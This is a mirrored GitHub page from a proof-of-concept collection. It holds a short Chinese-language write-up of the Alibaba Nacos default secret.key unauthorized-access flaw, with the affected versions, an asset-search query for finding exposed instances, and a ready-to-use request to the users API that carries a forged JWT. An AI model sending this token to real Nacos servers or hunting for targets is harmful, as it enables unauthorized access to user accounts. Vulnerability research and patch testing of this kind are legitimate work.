admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/云安全漏洞/Nacos secret.key 默认密钥 未授权访问漏洞.md

35 lines
740 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Nacos secret.key 默认密钥 未授权访问漏洞
## 漏洞描述
Alibaba Nacos 使用了固定的secret.key默认密钥导致攻击者可以构造请求获取敏感信息导致未授权访问漏洞
## 漏洞影响
```
Alibaba Nacos <= 2.2.0
```
## 网络测绘
```
app="NACOS"
```
## 漏洞复现
登陆页面
![image-20230417093555107](images/image-20230417093555107.png)
漏洞原因是使用了固定的Key
![image-20230417093624167](images/image-20230417093624167.png)
验证POC
```
/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9
```
![image-20230417093649928](images/image-20230417093649928.png)
Reference in New Issue Copy Permalink